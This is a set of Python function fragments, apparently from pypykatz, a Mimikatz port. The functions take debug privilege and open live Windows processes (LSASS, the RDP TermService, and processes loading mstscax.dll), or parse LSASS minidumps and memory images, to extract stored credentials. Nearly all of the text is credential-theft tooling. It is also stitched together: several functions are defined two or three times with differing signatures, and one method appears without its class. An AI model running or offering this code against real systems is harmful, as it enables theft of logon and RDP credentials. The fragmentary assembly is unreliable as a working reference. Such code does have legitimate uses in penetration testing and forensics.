def go_live(pid = None, all_rdp = False): if platform.system() != 'Windows': raise Exception('Live parsing will only work on Windows') from pypykatz.commons.readers.local.common.live_reader_ctypes import OpenProcess, PROCESS_ALL_ACCESS from pypykatz.commons.winapi.machine import LiveMachine from pypykatz.commons.winapi.constants import PROCESS_VM_READ , PROCESS_VM_WRITE , PROCESS_VM_OPERATION , PROCESS_QUERY_INFORMATION , PROCESS_CREATE_THREAD from pypykatz.commons.readers.local.common.privileges import enable_debug_privilege from pypykatz.commons.readers.local.live_reader import LiveReader from pypykatz.commons.readers.local.process import Process req_access_rights = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD enable_debug_privilege() targets = [] if pid is not None: process = Process(pid=pid, access = req_access_rights ) process.list_modules() reader = LiveReader(process_handle=process.phandle) sysinfo = KatzSystemInfo.from_live_reader(reader) targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo)) else: machine = LiveMachine() for service_name, display_name, pid in machine.list_services(): if service_name == 'TermService': process = Process(pid=pid, access = req_access_rights ) reader = LiveReader(process_handle=process.phandle) sysinfo = KatzSystemInfo.from_live_reader(reader) targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo)) if all_rdp is True: for pid in machine.list_all_pids(): try: process = Process(pid=pid, access = req_access_rights ) for module in process.list_modules(): if module.name.lower().find("mstscax.dll") != -1: reader = LiveReader(process_handle=process.phandle) sysinfo = KatzSystemInfo.from_live_reader(reader) targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo)) break except Exception as e: #import traceback #traceback.print_exc() print(e) for target in targets: target.start() return targets
def parse_memory_dump_rekall(filename, override_timestamp=None): from pypykatz.commons.readers.rekall.rekallreader import RekallReader reader = RekallReader.from_memory_file(filename, override_timestamp) sysinfo = KatzSystemInfo.from_rekallreader(reader) mimi = pypykatz(reader, sysinfo) mimi.start() return mimi
def go_rekall(session, override_timestamp = None, buildnumber = None, packages = ['all']): from pypykatz.commons.readers.rekall.rekallreader import RekallReader reader = RekallReader.from_session(session, override_timestamp, buildnumber) sysinfo = KatzSystemInfo.from_rekallreader(reader) mimi = pypykatz(reader, sysinfo) mimi.start(packages) return mimi
def go_live_phandle(lsass_process_handle, packages=['all']): if platform.system() != 'Windows': raise Exception('Live parsing will only work on Windows') from pypykatz.commons.readers.local.live_reader import LiveReader reader = LiveReader(lsass_process_handle=lsass_process_handle) sysinfo = KatzSystemInfo.from_live_reader(reader) mimi = pypykatz(reader.get_buffered_reader(), sysinfo) mimi.start(packages) return mimi
def go_live(): if platform.system() != 'Windows': raise Exception('Live parsing will only work on Windows') from pypykatz.commons.readers.local.live_reader import LiveReader reader = LiveReader() sysinfo = KatzSystemInfo.from_live_reader(reader) mimi = pypykatz(reader.get_buffered_reader(), sysinfo) mimi.start() return mimi
def parse_minidump_buffer(buff, packages=['all']): """ Parses LSASS minidump file which contents are in a bytes buffer buff: io.BytesIO object """ minidump = MinidumpFile.parse_buff(buff) reader = minidump.get_reader().get_buffered_reader() sysinfo = KatzSystemInfo.from_minidump(minidump) mimi = pypykatz(reader, sysinfo) mimi.start(packages) return mimi
def parse_minidump_bytes(data, packages=['all']): """ Parses LSASS minidump file bytes. data needs to be bytearray """ minidump = MinidumpFile.parse_bytes(data) reader = minidump.get_reader().get_buffered_reader() sysinfo = KatzSystemInfo.from_minidump(minidump) mimi = pypykatz(reader, sysinfo) mimi.start(packages) return mimi
async def parse_minidump_external(handle, packages = ['all'], chunksize=10*1024): """ Parses LSASS minidump file based on the file object. File object can really be any object as longs as it implements read, seek, tell functions with the same parameters as a file object would. handle: file like object """ minidump = await AMinidumpFile.parse_external(handle) reader = minidump.get_reader().get_buffered_reader(chunksize) sysinfo = KatzSystemInfo.from_minidump(minidump) mimi = apypykatz(reader, sysinfo) await mimi.start(packages) return mimi
def parse_minidump_external(handle): """ Parses LSASS minidump file based on the file object. File object can really be any object as longs as it implements read, seek, tell functions with the same parameters as a file object would. handle: file like object """ minidump = MinidumpFile.parse_external(handle) reader = minidump.get_reader().get_buffered_reader() sysinfo = KatzSystemInfo.from_minidump(minidump) mimi = pypykatz(reader, sysinfo) mimi.start() return mimi
def parse_minidump_file(filename, rdp_module, chunksize = 10*1024): try: minidump = MinidumpFile.parse(filename) reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=chunksize) sysinfo = KatzSystemInfo.from_minidump(minidump) except Exception as e: logger.exception('Minidump parsing error!') raise e try: mimi = RDPCredParser(None, reader, sysinfo, rdp_module) mimi.start() except Exception as e: logger.info('Credentials parsing error!') raise e return [mimi]
async def parse_minidump_file(filename, packages = ['all'], chunksize=10*1024): try: minidump = await AMinidumpFile.parse(filename) reader = minidump.get_reader().get_buffered_reader(chunksize) sysinfo = KatzSystemInfo.from_minidump(minidump) except Exception as e: logger.exception('Minidump parsing error!') raise e try: mimi = apypykatz(reader, sysinfo) await mimi.start(packages) except Exception as e: #logger.info('Credentials parsing error!') mimi.log_basic_info() raise e return mimi
def parse_minidump_file(filename): try: minidump = MinidumpFile.parse(filename) reader = minidump.get_reader().get_buffered_reader() sysinfo = KatzSystemInfo.from_minidump(minidump) except Exception as e: logger.exception('Minidump parsing error!') raise e try: mimi = pypykatz(reader, sysinfo) mimi.start() except Exception as e: #logger.info('Credentials parsing error!') mimi.log_basic_info() raise e return mimi
def get_sysinfo(self): self.sysinfo = KatzSystemInfo() #print('[+] Getting BuildNumer') self.sysinfo.buildnumber = VmmPy_ConfigGet( VMMDLL_OPT_WIN_VERSION_BUILD) #print('[+] Found BuildNumber %s' % self.sysinfo.buildnumber) #print('[+] Getting msv_dll_timestamp') self.sysinfo.msv_dll_timestamp = int( PEGetFileTime(self.process_pid, self.process_name)) #print('[+] Found msv_dll_timestamp %s' % self.sysinfo.msv_dll_timestamp) #print('[+] Getting arch') val = VmmPy_ConfigGet(VMMPY_OPT_CORE_SYSTEM) if val == VMMPY_SYSTEM_WINDOWS_X64: self.sysinfo.architecture = KatzSystemArchitecture.X64 else: self.sysinfo.architecture = KatzSystemArchitecture.X86